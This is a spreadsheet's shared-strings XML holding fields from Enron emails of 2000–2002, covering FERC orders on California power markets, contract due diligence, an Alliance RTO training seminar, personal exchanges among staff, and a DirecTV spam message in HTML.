    <t>frozenset({'jake.thomas@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'tim.heizenrader@enron.com', 'neil.bresnan@enron.com', 'chris.mallory@enron.com', 'robert.badeer@enron.com', 'michael.etringer@enron.com', 'stephen.swain@enron.com', 'dennis.benevides@enron.com', 'jeff.richter@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'mark.fillinger@enron.com', 'bill.iii@enron.com', 'steve.hall@enron.com', 'phillip.platter@enron.com', 'carla.hoffman@enron.com', 'diana.scholtes@enron.com', 'chris.foster@enron.com', 'matt.motley@enron.com', 'david.parquet@enron.com', 'sean.crandall@enron.com', 'elliot.mainzer@enron.com', 'christopher.calger@enron.com', 'jubran.whalan@enron.com', 'lester.rawson@enron.com', 'greg.wolfe@enron.com'})</t>
  </si>
  <si>
    <t>FERC Affirms ISO's Underscheduling Charge-- no BEEP Split -- Grants_x000D_
 QF Release from Contracts In Part -- Removes Obstacles</t>
  </si>
  <si>
    <t>FERC issued three CA orders today.  Ray Alvarez sent out a summary on the _x000D_
order related to increasing Generation and Transmission in the west. The _x000D_
report below came from IEP's attorney._x000D_
_x000D_
Underscheduling -- Enron has been on both sides on this issue -- here's _x000D_
what's happened_x000D_
_x000D_
One CA order rejects the requests by PG&amp;E, SoCal Edison and the CAISO to_x000D_
suspend the underscheduling penalty adopted in the December 15th Order.  The_x000D_
Commission is currently reviewing data filed by the CAISO in conjunction_x000D_
with a request to waive the underscheduling and will address the_x000D_
underscheduling penalty in a future order.  The Order does accept the_x000D_
CAISO's proposal to split the BEEP stack into Operating Reserves and_x000D_
Imbalance Energy._x000D_
_x000D_
_x000D_
QFs -- Ridgewood Complaint_x000D_
_x000D_
The second order address QF issues.  Granting, in part, Ridgewood and CCC's_x000D_
request for emergency relief, the Commission ruled that when QFs sell excess_x000D_
power or make third party sales as authorized by a court, the California_x000D_
utilities must provide interconnection and transmission service to make_x000D_
those sales.  The Commission deferred decision on whether QFs that have not_x000D_
been fully paid can make third party bilateral sales._x000D_
_x000D_
_x000D_
Obstacles -- Subject of Ray's earlier e-mail_x000D_
_x000D_
The third order addresses obstacles to increased energy supply.  The_x000D_
Commission takes a number of actions, including allowing premium returns on_x000D_
equity (200 basis points) and accelerated depreciation (10 years) for_x000D_
projects that increase transmission capacity in the short term (July 1,_x000D_
2001).  The basis points go down if the project comes on later.  The order_x000D_
also allows rolled-in treatment of interconnection and upgrade costs for new_x000D_
supply, broadens and extends QF waivers of operating and efficiency_x000D_
standards, waives prior notice requirements and grants market-based rate_x000D_
authority for sales from back-up and self-generation in WSCC, authorizes_x000D_
certain demand side sales and management programs, and encourages pipeline_x000D_
construction projects._x000D_
_x000D_
More to follow when we review the orders._x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 11:06:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Here is the link to the GISB, however trade has been terminated on this agreement as it was assigned last year to HPL prior to the sale.  Alisha Mahabir and I are currently negotiating a new GISB with MGI with some difficulty. Also concerning PMI Trading, at present I show only swap agreements with this company.  Marie Heard or Susan Bailey can assist you with swap agreements.  Please give me a call if you wish to discuss this further. I have asked Alisha to give you a call regarding MGI.  _x000D_
 _x000D_
 http://edms.livelink.enron.com/ena/livelink.exe/1604758/96022451_01-Jun-1999.pdf?func=doc.Fetch&amp;nodeid=1604758</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 08:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'suzanne.franco@enron.com'})</t>
  </si>
  <si>
    <t>20/20 Due Diligence</t>
  </si>
  <si>
    <t>Gerald,_x000D_
_x000D_
 While reviewing Lost Creek documents, number II.h. on the Index of _x000D_
Agreements, I found that we do not have a copy of numbers 5 and 6 to the _x000D_
Table of Contents for II.h.  Would you please send me a copy of:_x000D_
_x000D_
 5.  Amendment No. 1 to Firm Gathering Agreement; Firm Gathering Agreement _x000D_
between BRTI and LCGC; and_x000D_
_x000D_
 6.  Burlington Resources Inc.'s Guaranty of BRTI's obligations under the _x000D_
BRTI Firm Gathering Agreement._x000D_
_x000D_
If you would like to fax these documents to me, the fax number is (402) _x000D_
398-7914; to send them to me via inter-office mail, I am at OMA0539.  If you _x000D_
need to reach me by phone, please call 402/398-7885._x000D_
_x000D_
Thanks._x000D_
_x000D_
Suzanne</t>
  </si>
  <si>
    <t>Mon, 3 Apr 2000 08:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'danielles@jonesgranger.com'})</t>
  </si>
  <si>
    <t>Hey_x000D_
_x000D_
I just got your msg from friday.  I left at around three._x000D_
 _x000D_
How was your weekend?  Did you make it to earth day?_x000D_
_x000D_
Talk to you later.</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 03:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Direct Access Package</t>
  </si>
  <si>
    <t>oh shit.  you're right.</t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 03:43:53 -0800 (PST)</t>
  </si>
  <si>
    <t>Get a DirecTV System for FREE!!</t>
  </si>
  <si>
    <t>_x000D_
&lt;html&gt;_x000D_
&lt;head&gt;_x000D_
&lt;title&gt;Untitled Document&lt;/title&gt;_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;_x000D_
&lt;/head&gt;_x000D_
_x000D_
&lt;body bgcolor="#FFFFFF"&gt;&lt;center&gt;_x000D_
&lt;table width="540" border="1" cellspacing="0" cellpadding="3" bordercolor="#999999"&gt;_x000D_
 &lt;tr bgcolor="#0099FF"&gt;_x000D_
 &lt;td bgcolor="#FFFFFF" height="48"&gt;_x000D_
 &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;If_x000D_
 you do not wish to receive email from Bargain Bazaar, please Click Here:&lt;br&gt;_x000D_
 &lt;a href="http://www.m-ul.com/e/unsub.cgi?l=9969&amp;m=1736394363"&gt;UNSUBSCRIBE&lt;/a&gt;_x000D_
 &lt;/font&gt;&lt;/div&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;br&gt;_x000D_
 &lt;table width="530" border="3" cellspacing="0" cellpadding="0" bordercolor="#000099"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table width="100%" border="1" cellspacing="0" cellpadding="0" bordercolor="#E7E394"&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="2"&gt;_x000D_
 &lt;tr align="center" bgcolor="#0033CC"&gt;_x000D_
 &lt;td&gt;&lt;img src="http://www.m-ul.com/email/images/headers/supersavingszone.jpg" width="525" height="70"&gt;&lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;tr align="center"&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table bordercolor=#000099 cellspacing=0 cellpadding=0 width=375 border=1&gt;_x000D_
 &lt;tbody&gt;_x000D_
 &lt;tr&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;table bordercolor=#3300cc cellspacing=0 cellpadding=2 width="100%"_x000D_
 border=0&gt;_x000D_
 &lt;tbody&gt;_x000D_
 &lt;tr align=middle&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;div align="center"&gt;&lt;a_x000D_
 href="http://www.m-ul.com/e/c.cgi?j=20020115_56&amp;e=1736394363&amp;r=u3587&amp;d=6&amp;p=1"&gt;&lt;img_x000D_
 height=221_x000D_
 src="http://www.bay9.com/email/images/html101601/dialadish_1656_9313.gif"_x000D_
 width=357 border=0 nosend="1"&gt;&lt;/a&gt;&lt;/div&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;tr align=middle bgcolor=#e9e9e9&gt;_x000D_
 &lt;td&gt;_x000D_
 &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" color=#000099_x000D_
 size=3&gt;With &lt;font color=#cc0000&gt;DIRECTV&lt;/font&gt;, you get:&lt;/font&gt;&lt;font_x000D_
 face="Arial, Helvetica, sans-serif" size=3&gt;&lt;br&gt;_x000D_
 &amp;#8226; Over &lt;font_x000D_
 color=#ff3300&gt;255&lt;/font&gt; Channels! &lt;br&gt;_x000D_
 &amp;#8226; A Crisp Digital Picture! &lt;br&gt;_x000D_
 &amp;#8226; CD Quality Audio! &lt;/font&gt;&lt;/b&gt;&lt;/div&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;tr align=middle&gt;_x000D_
 &lt;td height="6"&gt; &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/tbody&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/tbody&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
 &lt;/td&gt;_x000D_
 &lt;/tr&gt;_x000D_
 &lt;/table&gt;_x000D_
&lt;/center&gt;_x000D_
&lt;img height="1" width="1" src="http://www.m-ul.com/e/e_open.cgi?j=20020115_56&amp;mail_id=1736394363"&gt;&lt;/body&gt;_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 10:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>565226</t>
  </si>
  <si>
    <t>There is a leg 2 for this deal that has come up on the list to be confirmed.  _x000D_
We did not confirm leg 1 of this deal and I don't think we confirm _x000D_
buy/resales as they are like transmission.  Could check into this and let me _x000D_
know._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 09:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cindy.skinner@enron.com'})</t>
  </si>
  <si>
    <t>DAVID G. EHLIS</t>
  </si>
  <si>
    <t xml:space="preserve">I sent this on to Gary and Jeff.  He's worth talking to._x000D_
mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 08/17/2000 _x000D_
04:31 PM ---------------------------_x000D_
_x000D_
_x000D_
Maxine E Levingston@ENRON_x000D_
08/16/2000 04:57 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc: Cathy Phillips/HOU/ECT@ECT _x000D_
Subject: DAVID G. EHLIS_x000D_
_x000D_
Mike,_x000D_
_x000D_
Attached is the resume I mentioned to you yesterday on voice mail.  I can _x000D_
personally speak for Dave as an outstanding performer.  I am looking forward _x000D_
to getting together with you in the next week or two._x000D_
_x000D_
Take care,_x000D_
Billy_x000D_
---------------------- Forwarded by Maxine E Levingston/Corp/Enron on _x000D_
08/16/2000 04:45 PM ---------------------------_x000D_
_x000D_
_x000D_
"Dave Ehlis" &lt;dehlis@worldnet.att.net&gt; on 08/04/2000 03:52:25 PM_x000D_
To: "Billy Lemmons" &lt;billy.lemmons@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Agribusiness_x000D_
_x000D_
_x000D_
_x000D_
Billy,_x000D_
?_x000D_
Good talking to you today.??Thanks for  taking a look at this._x000D_
?_x000D_
Dave_x000D_
 - Agribusiness.doc_x000D_
 - DRES.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Mar 2002 14:35:02 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Draft - SoCal/Topock Announcement</t>
  </si>
  <si>
    <t>Lindy, this looks good.  I like it._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donoho, Lindy  _x000D_
Sent:	Friday, March 01, 2002 3:16 PM_x000D_
To:	Watson, Kimberly; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; McConnell, Mark; Y'barbo, Paul; Kilmer III, Robert; Harris, Steven_x000D_
Subject:	Draft - SoCal/Topock Announcement_x000D_
_x000D_
Here's a simple first draft.  I didn't know how much detail we should get into._x000D_
_x000D_
Ramona, am I using the correct terminology?  They are not going to confirm in Cycle 1.  They are just going to let us fill-in where El Paso filled-up all the capacity downstream._x000D_
_x000D_
 &lt;&lt; File: SoCal-TopockScheduling.doc &gt;&gt; _x000D_
_x000D_
Let me know your comments._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Fri, 27 Jul 2001 07:32:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'corry.bentley@enron.com', 'don.baughman@enron.com', 'tom.may@enron.com', 'a..allen@enron.com'})</t>
  </si>
  <si>
    <t>FW: Initial ARTO Customer Education Seminar Announcement</t>
  </si>
  <si>
    <t>Looks like the Arto is making some moves.  Please review below and plan on =_x000D_
coordinating our attendance._x000D_
_x000D_
Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Roan, Michael =20_x000D_
Sent:=09Thursday, July 26, 2001 1:58 PM_x000D_
To:=09Rodriquez, Andy_x000D_
Cc:=09Will, Lloyd; Sharfman, Guy; Merola, Jeff_x000D_
Subject:=09FW: Initial ARTO Customer Education Seminar Announcement_x000D_
_x000D_
Andy, this would be you i presume..._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09agnes.mikuta@us.andersen.com@ENRON [mailto:IMCEANOTES-agnes+2Emiku=_x000D_
ta+40us+2Eandersen+2Ecom+40ENRON@ENRON.com]=20_x000D_
Sent:=09Thursday, July 26, 2001 1:23 PM_x000D_
To:=09harold_adams@dom.com; baerm@firstenergy.com; cmballast@consumersenerg=_x000D_
y.com; bbleiwers@reliant.com; mbohorquez@newenergy.com; mebolan@firstenergy=_x000D_
corp.com; bruce.campbell@mirant.com; kenneth.caretta@pseg.com; tcarlson@rel=_x000D_
iant.com; joe.cavello@orionpowermw.com; john_chandley@lecg.com; Chapman, To=_x000D_
m; cohen@occ.state.oh.us; amy.cone@scgo.com; jason.w.cox@dynegy.com; jcrowl=_x000D_
ey@pwrteam.com; cunninghamg@firstenergycorp.com; jdauphinais@consultbai.com=_x000D_
; gwdawson@bethsteel.com; TomDelaneyaz@aol.com; delpezjf@apci.com; desrosie=_x000D_
rsd@dteenergy.com; jay_d_dibble@reliantenergy.com; richard.doying@neg.pge.c=_x000D_
om; wdunn@bdrnet.com; rdearl@imea.com; ceaton@deloitte.com; eisenstatl@dsmo=_x000D_
.com; dellis@psc.state.wv.us; andy_evans@dom.com; hugh.evans@cplc.com; rfah=_x000D_
ey@edisonmission.com; aflater@atcllc.com; luis.fondacci@ncemcs.com; bob.for=_x000D_
tney@puc.state.oh.us; james_fuhrmann@illinoispower.com; dfulton@enron.com; =_x000D_
slgaarde@cmsenergy.com; markg@acespower.com; michael.gaona@ncemcs.com; jgar=_x000D_
dner@midwestiso.org; mfgildea@duke-energy.com; rgilkey@mwn.com; hhaas@icc.s=_x000D_
tate.il.us; paul.halas@us.ngrid.com; ndhammer@midamerican.com; janet.c.hann=_x000D_
eman@cis.state.mi.us; erik.hansen@cplc.com; James_Hayes@dom.com; uheinze@am=_x000D_
eren.com; dhennen@ameren.com; Don.Howard@puc.state.oh.us; Barry.Huddleston@=_x000D_
dynergy.com; Rahuhn@nisource.com; william.hunter@us.cgeyc.com; ioanidisg@dt=_x000D_
eenergy.com; joe.isabella@nrgenergy.com; sivey@pwrteam.com; jardenr@nmenerg=_x000D_
y.com; bill.jett@cinergy.com; jim.keller@wepco.com; skelly@mbolaw.com; shaw=_x000D_
n_p_kestler@reliantenergy.com; beckykilbourne@aol.com; peggy.ladd@alliancer=_x000D_
to.com; ljlamatrice@aep.com; terry.lane@dynegy.com; dalapinski@cmsenergy.co=_x000D_
m; kmlagura@nisource.com; jim.latimer@oatiinc.com; larry.leonard@exeloncorp=_x000D_
.com; stephen.lesniak@exeloncorp.com; john.levett@orionpower.com; carlton.l=_x000D_
ewis@ncemcs.com; dlinton@ameren.com; loreschj@firstenergycorp.com; jim.mayh=_x000D_
ew@mirant.com; william_mcbride@dom.com; Merola, Jeff; mmiglior@amp-ohio.org=_x000D_
; mark_myers@cargill.com; steven.naumann@exeloncorp.com; lnendza@pwrteam.co=_x000D_
m; gary.newell@spiegelmcd.com; obrothr@erols.com; pologhl@erinet.com; john_=_x000D_
r_orr@reliantenergy.com; lpadilla@sempra-res.com; gapa@dynergy.com; pattond=_x000D_
@caperon.com; kathy.patton@dynegy.com; eprrigo@epsa.org; Mark_Petersen@dom.=_x000D_
com; brian.plumb@us.ngrid.com; pkp@nbgroup.com; twpysl@nisource.com; gary.r=_x000D_
ackliffe@ustra.mail.abb.com; jrainey@odec.com; raf_rana@aep.com; Roan, Mich=_x000D_
ael; robertsk@firstenergycorp.com; glenn_ross@dom.com; bmruhl@cmsenergy.com=_x000D_
; rushnoka@firstenergycorp.com; jerry.sadlowski@ey.com; dmschlegel@aep.com;=_x000D_
 shawn_schukar@illinoispower.com; schultzra@dteenergy.com; bob.schwentker@n=_x000D_
cemcs.com; rsease@scana.com; mseidler@amerenenergy.com; richard.sella@wepco=_x000D_
.com; psellers@cblaw.com; aserri@amerenenergy.com; gshaffman@enron.com; rsh=_x000D_
ah@sempra-res.com; hertzel.shamash@dplinc.com; shepard@caes.net; trshields@=_x000D_
duke-energy.com; shams_siddiqi@hotmail.com; harry.singh@neg.pge.com; slater=_x000D_
n@detroitedison.com; smithsatl@mindspring.com; patriciatsmith@mindspring.co=_x000D_
m; rcsmith@ameren.com; wayman.smith@williams.com; rsnead@cinergy.com; denni=_x000D_
s.sobieski@pseg.com; butchs@gdassoc.com; jssolomon@aep.com; solomontg@nmene=_x000D_
rgy.com; rspamgl1@txu.com; lspears@ipalco.com; hspinner@scc.state.va.us; je=_x000D_
nnifer.sterling@exeloncorp.com; jfstough@aep.com; dtaylor@constellation.com=_x000D_
; bxtierney@aep.com; greg.towstego@opg.com; jerry_trice@dom.com; jt@buckeye=_x000D_
power.com; royt@acespower.com; mina.turner@mirant.com; mulrich@enron.com; c=_x000D_
walker@scc.state.va.us; john.wallace@deml.com; elaine_walsh@dc.kirkland.com=_x000D_
; paul.wehr@wepco.com; wehrungb@dteenergy.com; rweishaa@mwn.com; gweiss@ame=_x000D_
renenergy.com; welchj@dteenergy.com; richard.d.whale@cis.state.mi.us; cwhit=_x000D_
e@scana.com; doug.white@cplc.com; twolke@altra.com; woodward@delanet.com; w=_x000D_
alt.yeager@cinergy.com; myork@hbgelec.com; rzabros@alleghenyenergy.com; bar=_x000D_
bara.ziberna@ncemcs.com; dmzwitte@cmsenergy.com; Agnes.Mikuta@us.arthurande=_x000D_
rsen.com; baerm@firstenergycorp.com; barry.huddleston@dynegy.com; david.o.j=_x000D_
ermain@us.andersen.com; desrosiersd@dteenergy.com; dlinton@ameren.com; dmsc=_x000D_
hlegel@aep.com; gfuerst@ameren.com; harold_adams@dom.com; ioanidisg@dteener=_x000D_
gy.com; jfstough@aep.com; kathy_patton@dynegy.com; Ken_Berger@dom.com; kevi=_x000D_
n.hall@dplinc.com; KMLargura@nisource.com; lawrence.m.oliva@us.andersen.com=_x000D_
; pkp@nbgroup.com; peggy.ladd@alliancerto.com; randy_hunt@dom.com; rdrana@a=_x000D_
ep.com; shams_siddiqi@hotmail.com; shawn_schukar@illinoispower.com; slaterm=_x000D_
@dteenergy.com; steven.naumann@exeloncorp.com; zdziebkor@dteenergy.com; rus=_x000D_
hnoka@firstenergycorp.com; Camden_L._Collins@us.andersen.com; dpatton@potom=_x000D_
aceconomics.com; Accessories@arthurandersen.com_x000D_
Subject:=09Initial ARTO Customer Education Seminar Announcement_x000D_
_x000D_
_x000D_
Initial ARTO Customer Education Seminar Announcement_x000D_
_x000D_
In preparation for Operational Trials, the Alliance Participants_x000D_
Administrative and Start-Up Activities Company, LLC (BridgeCo) would_x000D_
like to announce the preparatory training seminar for marketer_x000D_
participation._x000D_
_x000D_
Seminar Purpose_x000D_
     The purpose of the upcoming seminar is to prepare customers  for_x000D_
participation in the upcoming ARTO Operational Trials, which will begin_x000D_
on or around August  23rd.   Future customer training seminars will be_x000D_
scheduled throughout the fall, starting in September._x000D_
_x000D_
Who Should Participate_x000D_
     Customers who will volunteer to participate in ARTO Operational_x000D_
Trials are encouraged to attend.  If you would like to volunteer, please_x000D_
respond to this message. More information on the Operational Trials will be_x000D_
soon_x000D_
available on the ARTO website.  The initial training will be limited to 50_x000D_
participants._x000D_
_x000D_
Dates and Location_x000D_
     Thursday       August 16 8:00 a.m.- 5:00 p.m._x000D_
     Friday              August 17       8:00 a.m. - 12:00 p.m._x000D_
_x000D_
     Palmer House Hilton Hotel_x000D_
     17 East Monroe Street_x000D_
     Chicago, IL 60603_x000D_
     1-312-726-7500_x000D_
_x000D_
     Information about future training seminars will be posted on the_x000D_
Alliance RTO_x000D_
page, www.alliancerto.com._x000D_
_x000D_
How to Register_x000D_
     A registration form will soon be posted on the Alliance RTO_x000D_
website. Prior to that form's activation, you may respond to this message._x000D_
_x000D_
FUTURE TRAINING LOCATIONS_x000D_
_x000D_
Alliance RTO is soliciting suggestions regarding future training_x000D_
locations. Please respond to this message with your suggestions.  Also, if_x000D_
you have_x000D_
any additional comments or suggestions regarding the future training,_x000D_
please forward them via e-mail or internet._x000D_
_x000D_
*******************Internet Email Confidentiality Footer*******************_x000D_
_x000D_
_x000D_
Privileged/Confidential Information may be contained in this message.  If_x000D_
you are not the addressee indicated in this message (or responsible for_x000D_
delivery of the message to such person), you may not copy or deliver this_x000D_
message to anyone. In such case, you should destroy this message and kindly_x000D_
notify the sender by reply email. Please advise immediately if you or your_x000D_
employer do not consent to Internet email for messages of this kind._x000D_
Opinions, conclusions and other information in this message that do not_x000D_
relate to the official business of my firm shall be understood as neither_x000D_
given nor endorsed by it.</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 12:38:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris_ballou@bmc.com'})</t>
  </si>
  <si>
    <t>RE: Marcel Wanders</t>
  </si>
  <si>
    <t>Yes I plan on going to all if I can.  I will let you know.  Thanks and have a great day.  See you soon._x000D_
_x000D_
John_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Ballou, Chris" &lt;Chris_Ballou@bmc.com&gt;@ENRON  _x000D_
Sent:	Monday, January 28, 2002 2:30 PM_x000D_
To:	Griffith, John_x000D_
Subject:	RE: Marcel Wanders_x000D_
_x000D_
Hey John,_x000D_
_x000D_
Yes and there's a Design Council event with him Tuesday night and a_x000D_
reception at Sunset Settings on Thursday.  Will we see you at any or all of_x000D_
the above?_x000D_
_x000D_
Chris_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Chris Ballou and/or his relevant affiliates_x000D_
and may contain confidential and privileged material for the sole use of the_x000D_
intended recipient(s). Any review, use, distribution or disclosure by others_x000D_
is strictly prohibited. If you are not the intended recipient (or authorized_x000D_
to receive for the recipient), please contact the sender or reply to Chris_x000D_
Ballou at chris_ballou@chrisballou.com and delete all copies of the message._x000D_
This e-mail (and any attachments hereto) are not intended to be an offer (or_x000D_
an acceptance) and do not create or evidence a binding and enforceable_x000D_
contract between Chris Ballou (or any of its affiliates) and the intended_x000D_
recipient or any other party, and may not be relied on by anyone as the_x000D_
basis of a contract by estoppel or otherwise. Thank you. :-)_x000D_
**********************************************************************_x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Griffith@enron.com [mailto:John.Griffith@enron.com]_x000D_
Sent: Monday, January 28, 2002 2:19 PM_x000D_
To: Chris_Ballou@bmc.com_x000D_
Subject: Marcel Wanders_x000D_
_x000D_
_x000D_
Hey Chris,_x000D_
_x000D_
What is going on?  Are you going to go see the Marcel Wanders lecture at_x000D_
the museum on Wednesday?  Just checking to see what is happening.  Hope all_x000D_
is well.  Talk to you soon._x000D_
_x000D_
John_x000D_
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t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 15:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Nothing bad...</t>
  </si>
  <si>
    <t>Had a bit of an encounter with Ted last night.  Turns out it wasn't as bad =_x000D_
as I thought it was based upon the email below.  Start from the bottom and =_x000D_
work your way up.  FYI he's kidding about the MD (managing director) and Go=_x000D_
d comments._x000D_
_x000D_
---------------------- Forwarded by Susan M Scott/HOU/ECT on 04/19/2001 12:=_x000D_
48 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
04/19/2001 11:23 AM_x000D_
To:=09Ted Noble/HOU/ECT@ECT_x000D_
cc:=09=20_x000D_
Subject:=09Re: Nothing bad...  =20_x000D_
_x000D_
The email was titled "nothing bad..." so you wouldn't immediately trash it =_x000D_
for fear I was dispensing some more of Susan's homespun wisdom.  I know you=_x000D_
 can't get enough of that stuff.  As for the revenue generation, I've heard=_x000D_
 what a boon the Ag group has been to EGM.  From what I understand you guys=_x000D_
 are carrying the rest of that company on your backs...keep up the good wor=_x000D_
k!  And yes, the world you live in does revolve around you Ted, it's just t=_x000D_
hat no one else lives in that world besides you so it stands to reason that=_x000D_
 would be the case.  Your welcome for the email.  I really am happy for you=_x000D_
 that things seem to be going well and that you appear to be enjoying what =_x000D_
you're doing (I haven't heard any of the "when I grow up I want to be a ...=_x000D_
.." comments out of you in a while, a sure sign of contentment and maturity=_x000D_
 - okay burgeoning maturity).  In regards to trading, I am absolutely lovin=_x000D_
g it.  I've been on EOL for a little over a month now (although my trades g=_x000D_
o into one of the other trader's books for the time being...I should get my=_x000D_
 own in a couple months) and am really enjoying the new life/perks this job=_x000D_
 allows.  Case in point, took my Mom to see Hakeem's last game with the Roc=_x000D_
kets on one of the brokers (center court seats...she was thrilled) and am o=_x000D_
ff to Vegas this weekend to "meet" with some of the power traders from Port=_x000D_
land.  So much for the 16-18 hour days I was dealing with for a year or so =_x000D_
there...given present circumstances it was all worth it._x000D_
_x000D_
No need to "let me of the hook" for my candor last night, I meant everythin=_x000D_
g I said and I wanted you to hear those things.  In a quest to be an oh so =_x000D_
witty smart-ass, sometimes I forget to just tell people what I think/feel..=_x000D_
.always catches up to me in hind-sight and if the opportunity presents itse=_x000D_
lf for me to rectify that then I don't believe in passing it up.  Contrary =_x000D_
to what you may think, I'm a big girl who thinks for herself and always act=_x000D_
s on her own volition.  And I think I either mumbled last night or your hea=_x000D_
ring is starting to go in your old age, but I said "clod" not "god"...subtl=_x000D_
e but important difference._x000D_
_x000D_
Shorty_x000D_
_x000D_
- You missed an impressive dancing display at Sierra's last night...I think=_x000D_
 I may have frightened some people._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ted Noble_x000D_
04/19/2001 10:06 AM_x000D_
To:=09Susan M Scott/HOU/ECT@ECT_x000D_
cc:=09=20_x000D_
Subject:=09Re: Nothing bad...  =20_x000D_
_x000D_
Why would you have to title an email "nothing bad...".  Personally, I was d=_x000D_
isappointed I wasn't promoted to MD because I have brought in so much reven=_x000D_
ue for Enron and as we know the entire world revolves around me.  Thanks on=_x000D_
 the email and how is trading going?  Also, I appreciate your candor last n=_x000D_
ight (you didn't think I would let you off the hook completely did you) and=_x000D_
 thanks for calling me a god.  It was flattering.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott_x000D_
04/19/2001 07:53 AM_x000D_
To:=09Ted Noble/HOU/ECT@ECT_x000D_
cc:=09=20_x000D_
Subject:=09Nothing bad..._x000D_
_x000D_
Congrats on the promotion.  I was a little suprised it was only to manager.=_x000D_
..I remember you saying something once about jumping straight to Director. =_x000D_
 All things in due time, right?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Fri, 21 Jan 2000 05:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Memo - Field-Market Cost Analysis</t>
  </si>
  <si>
    <t xml:space="preserve">I had assumed that the cost of service underlying the 11-1-99 rates was the _x000D_
most recent data we have handy, but I guess_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mary Kay Miller                           01/21/2000 07:27 AM_x000D_
	_x000D_
_x000D_
To: Drew Fossum_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Memo - Field-Market Cost Analysis  _x000D_
_x000D_
clarification--  do we want the latest cost of service or based on the _x000D_
settlement?? MK_x000D_
_x000D_
_x000D_
_x000D_
Martha Benner_x000D_
01/19/2000 12:34 PM_x000D_
To: Mary Kay Miller/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Memo - Field-Market Cost Analysis_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Feb 2000 01:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>The Real Options Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Please, forward my bio to Crystal._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/11/2000 _x000D_
08:34 AM ---------------------------_x000D_
_x000D_
_x000D_
Crystal Barry &lt;CBARRY@IIRLTD.CO.UK&gt; on 02/09/2000 05:05:17 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
